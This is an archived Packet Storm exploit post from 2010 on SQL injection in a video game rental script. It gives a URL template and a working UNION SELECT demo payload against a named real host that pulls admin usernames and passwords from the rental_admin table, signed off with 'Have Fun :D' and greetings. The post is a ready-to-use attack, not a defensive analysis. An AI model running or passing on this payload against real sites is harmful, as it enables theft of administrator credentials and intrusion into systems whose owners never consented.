Video Games Rentals Script SQL Injection

2010-02-12T00:00:00
ID PACKETSTORM:86215
Type packetstorm
Reporter JaMbA
Modified 2010-02-12T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: video games rentals Script SQL injection Vulnerability  
# Date: 11/02/2010  
# Author: JaMbA  
# Software Link: N/A  
# Version: all version  
# Tested on: Windows & Linux  
# CVE : ()  
  
:::::::::::::::::::::::::  
  
Exploit Title : video games rentals Script SQL injection Vulnerability  
  
Author : JaMbA  
  
Script Site : www.commodityrentals.com  
  
Version : All Versions  
  
Tested on : Windows & Linux  
  
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::  
  
:::::::::::::::::::::::::  
  
=====================================Exploit===============  
  
=========================  
  
[ EXPL0!T ]  
  
www.[Server}.com/[Path]/index.php?view=catalog&pfid=5[exploit code]&item_type=G  
  
[ D3M0 ]  
  
http://videogames.commodityrentals.com/index.php?view=catalog&pfid=-5+union+select+1,concat(admin_name,0x3a,admin_password),3,4,5+from+rental_admin--&item_type=G  
  
  
Have Fun :D  
  
===========================================================  
  
=========================  
  
Greetz to : Alnjm33-virus-pal - Predator-bingo2 - xXx-jago-dz -inejcteur-4PY-SaYrOs- XR57 -Tr0y-x Ahmadso -alsaek  
=== 3SI lycee jbel jloud ====  
  
  
  
________________________________  
Ihre E-Mails und mehr für unterwegs. Laden Sie Windows Live Hotmail kostenlos herunter. Melden Sie sich jetzt an.<https://signup.live.com/signup.aspx?id=60969>  
  
  
  
`